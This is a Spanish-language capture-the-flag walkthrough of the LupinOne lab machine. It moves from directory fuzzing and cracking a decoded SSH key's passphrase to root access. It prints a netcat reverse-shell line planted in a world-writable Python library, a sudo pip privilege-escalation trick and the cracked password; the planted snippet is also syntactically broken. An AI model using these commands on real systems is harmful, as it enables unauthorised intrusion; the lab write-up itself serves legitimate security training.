html-companyprofile.html [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 14ms]
html-companyprofile.txt [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 15ms]
html_node               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 0ms]
html_node.html          [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 1ms]
html_node.php           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 1ms]
html_node.txt           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 1ms]
httpdocs.html           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 6ms]
httpdocs.php            [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 6ms]
httpdocs.txt            [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 6ms]
httpdocs                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 11ms]
htmldoc                 [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 24ms]
htmldoc.php             [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 24ms]
htmldoc.html            [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 24ms]
htmldoc.txt             [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 24ms]
[WARN] Caught keyboard interrupt (Ctrl-C)
mysecret.txt            [Status: 200, Size: 4689, Words: 1, Lines: 2, Duration: 22ms]

Por lo que vemos nos saca un .txt mediante URL, por lo que entraremos en el...

URL = http://<IP>/~secret/.mysecret.txt

Nos mostrara el siguiente codigo:


Utilizaremos una pagina web especial para identificar que tipo de codifcacion tiene y es muy potente...

URL = https://gchq.github.io/CyberChef/

Descubrimos que es Base 58 por lo que lo decodificamos y veriamos lo siguiente...


Si intentamos conectarnos sin contraseña no nos dejara, por lo que intentaremos crackear la contraseña para conectarnos...

chmod 600 id_rsa
ssh2john id_rsa > clave


john --wordlist=/usr/share/wordlists/fasttrack.txt clave

Y utilizamos el diccionario que menciono en la pagina web anteriormente...


Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
P@55w0rd!        (id_rsa)     
1g 0:00:00:01 DONE (2024-05-28 10:18) 0.5464g/s 34.97p/s 34.97c/s 34.97C/s Winter2015..password2
Use the "--show" option to display all of the cracked passwords reliably
Session completed.


User = icex64
Password = P@55w0rd!
ssh -i id_rsa icex64@<IP>

Por lo que ya estariamos dentro, por lo que leeremos la flag...

user.txt (flag1)

    ...,    ,...    ..,.   .,,  *&@@@@@@@@@@&/.    ,,,.   .,..    ...,    ...,  
    ,,,.    .,,,    *&@@%%%%%%%%%%%%%%%%%%%%%%%%%%%&@,.   ..,,    ,,,,    ,,,.  
..,.    ,..,  (@&#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%&%,.    ..,,    ,...    ..
    .... .@&%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@  ....    ....    ,...  
    .,#@%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@  .,..    ,.,.    ...,  
.,,,&%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@#@.,    .,.,    .,..    .,
...@%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%&@####@*.    ..,,    ....    ,.
   @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@@%#######@% .,.,    .,.,    .,.,  
..,,@@%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@@@@@@@@%#######@@,    ..,.    ,..,    ..
.,,, @@@@@@@@&%%%%%%%%%%%%%&@@@@@@@@@@@@@@@@@@@%%%#####@@,    .,,,    ,,.,    .,
    ..@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%###@@ .,..    ...,    ....  
...,  .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%#&@.    ...,    ...,    ..
....   #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%%%@.    ....    ....    ..
    .,.,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&%%%%%%%#@*.,.,    .,.,    ..@@@@
..,.    .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%#@@    ..,.    ,..*@&&@@.
.,,.    ,.@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%%@@    .,,.    .@&&&@( ,,
    ,.,.  .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&%%%%%%%@@%%&@@@, ,,,@&@@@.,,,  
....    ...#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&&%%%%&%,@%%%%%%%#@@@@@%..    ..
...,    ...,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&&&&@,*,,@%%%%%%@@@&@%%@..    ..
    ,,.,    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@/,***,*,@%%%@@&@@@%%###@ ,,.,  
    .,. @@&&&@@,,/@@@@@@@@@@@@@@@@@@@@@@@@#,,,,,,,,,*,,@%%%@&&@@%%%%%##&* ,...  
.,,, @@&@@&@&@@%,*,*,*,*,***,*,*,***,*,*,*,*,*,*,**,&@%%&@@@&@%%%%%%%%@/.,    .,
  /@@&&&&&&&&&&@@*,,,,,,,,,,,,,,,,,,,,,,*,,,**,%@&%%%%@&&&@%%%%%%%%%@(    ,..,  
 @&@&@&@&@&@&@&&@@@@@(,*,*,,**,*,*,,,*#&@@&%%%%%%%%&@@@@@%%%%%%%%@&..,    .,.,  
@@@&&&&&&&&&&&&&&&&&@@@&&&@@@@&&@@&&@&&&%&%%%%%%%@&&&@&%%%%%%&@,..    ...,    ..
 @&&&@&@&@&@&@&@&@&@&@&@&@&@&&@@@&&&&&&&%&%%%%&@&&@@%%%#&@%..,    .,.,    .,.,  
  @@@@&&&&&&&&&&&&&&&&&&&&&&@&&&&&&&&&&&%%&%@&@&@&@@%..   ....    ....    ,..,  
.,,, *@@&&&@&@&@&@&@&@&&&&&&&&&&&&&&&&&%&&@@&&@....    ,.,    .,,,    ,,..    .,
    ,,,,    .,%@@@@@@@@@@@@@@@@%,  ...,@@&&@(,,    ,,,.   .,,,    ,,.,    .,,.  
    .,.,    .,,,    .,,.   ..,.    ,*@@&&@ ,,,,    ,.,.   .,.,    .,.,    .,.,  
...,    ....    ....    ,..    ,..@@@&@#,..    ....    ,..    ...,    ....    ..
    ....    ....    ...    ....@.,%&@..    ....    ...    ....    ....    ....  
    ...,    ....    ....   .*/,...&.,,,    ....    ....   .,..    ...,    ...,  
.,.,    .,.,    ,,.,    .,../*,,&,,    ,.,,    ,.,,    ..,    .,.,    .,.,    ,,


Si hacemos sudo -l veremos lo siguiente...

Por lo que podemos ver podemos ejecutar ese archivo .py como el usuario arsene, si leemos el codigo, veremos lo siguiente...

import webbrowser

print ("Its not yet ready to get in action")


Estamos viendo que esta importando algo llamado webbrowser, lo buscaremos...

find / -type f -name "webbrowser.py" 2>/dev/null | xargs ls -l

Y encontraremos lo siguiente...

-rw-r--r-- 1 icex64 icex64    34 May 28 10:28 /home/icex64/webbrowser.py
-rwxrwxrwx 1 root   root   24087 Oct  4  2021 /usr/lib/python3.9/webbrowser.py

Encontramos una hecha por root que podemos modificar, haremos lo siguiente dentro de ese archivo...

nano /usr/lib/python3.9/webbrowser.py
# Agrega tu código de reverse shell aquí 
reverse_shell_command = "nc -e /bin/bash <IP> <PORT>" os.system(reverse_shell_command)

Añadimos ese trozo por alguna parte del codigo de python...

sudo -u arsene python3.9 /home/arsene/heist.py

Estando a la escucha ejecutamos eso...

nc -lvnp <PORT>

Hecho esto ya seremos el usuario arsene...

Sanitizamos la shell...

script /dev/null -c bash
# <Ctrl> + <z>
stty raw -echo; fg
reset xterm
export TERM=xterm

# Para ver las dimensiones de nuestra consola en el Host
stty size

# Para redimensionar la consola ajustando los parametros adecuados
stty rows <ROWS> columns <COLUMNS>

Si hacemos sudo -l con el usuario arsene veremos lo siguiente...

Matching Defaults entries for arsene on LupinOne:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User arsene may run the following commands on LupinOne:
    (root) NOPASSWD: /usr/bin/pip

Por lo que vemos podemos ejecutar pip como root, por lo que haremos lo siguiente...

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF

Ejecutando esto ya seriamos root, leemos la flag...

root.txt (flag2)

,                       .&&&&&&&&&(            /&&&&&&&&&                       
,                    &&&&&&*                          @&&&&&&                   
,                *&&&&&                                   &&&&&&                
,              &&&&&                                         &&&&&.             
,            &&&&                   ./#%@@&#,                   &&&&*           
,          &%&&          &&&&&&&&&&&**,**/&&(&&&&&&&&             &&&&          
,        &@(&        &&&&&&&&&&&&&&&.....,&&*&&&&&&&&&&             &&&&        
,      .& &          &&&&&&&&&&&&&&&      &&.&&&&&&&&&&               &%&       
,     @& &           &&&&&&&&&&&&&&&      && &&&&&&&&&&                @&&&     
,    &%((            &&&&&&&&&&&&&&&      && &&&&&&&&&&                 #&&&    
,   &#/*             &&&&&&&&&&&&&&&      && #&&&&&&&&&(                 (&&&   
,  %@ &              &&&&&&&&&&&&&&&      && ,&&&&&&&&&&                  /*&/  
,  & &               &&&&&&&&&&&&&&&      &&* &&&&&&&&&&                   & &  
, & &                &&&&&&&&&&&&&&&,     &&& &&&&&&&&&&(                   &,@ 
,.& #                #&&&&&&&&&&&&&&(     &&&.&&&&&&&&&&&                   & & 
*& &                 ,&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&             &(&
*& &                 ,&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&            & &
*& *              &&&&&&&&&&&&&&&&&&&@.                 &&&&&&&&             @ &
*&              &&&&&&&&&&&&&&&&&&@    &&&&&/          &&&&&&                & &
*% .           &&&&&&&&&&&@&&&&&&&   &  &&(  #&&&&   &&&&.                   % &
*& *            &&&&&&&&&&   /*      @%&%&&&&&&&&    &&&&,                   @ &
*& &               &&&&&&&           & &&&&&&&&&&     @&&&                   & &
*& &                    &&&&&        /   /&&&&         &&&                   & @
*/(,                      &&                            &                   / &.
* & &                     &&&       #             &&&&&&      @             & &.
* .% &                    &&&%&     &    @&&&&&&&&&.   %@&&*               ( @, 
/  & %                   .&&&&  &@ @                 &/                    @ &  
*   & @                  &&&&&&    &&.               ,                    & &   
*    & &               &&&&&&&&&& &    &&&(          &                   & &    
,     & %           &&&&&&&&&&&&&&&(       .&&&&&&&  &                  & &     
,      & .. &&&&&&&&&&&&&&&&&&&&&&&&&&&&*          &  &                & &      
,       #& & &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&        &.             %  &       
,         &  , &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&.     &&&&          @ &*        
,           & ,, &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&.  /&&&&&&&&    & &@          
,             &  & #&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&  &&&&&&&@ &. &&            
,               && /# /&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&# &&&# &# #&               
,                  &&  &( .&&&&&&&&&&&&&&&&&&&&&&&&&&&  &&  &&                  
/                     ,&&(  &&%   *&&&&&&&&&&%   .&&&  /&&,                     
,                           &&&&&/...         .#&&&&#                           

See you on the next heist.

Last updated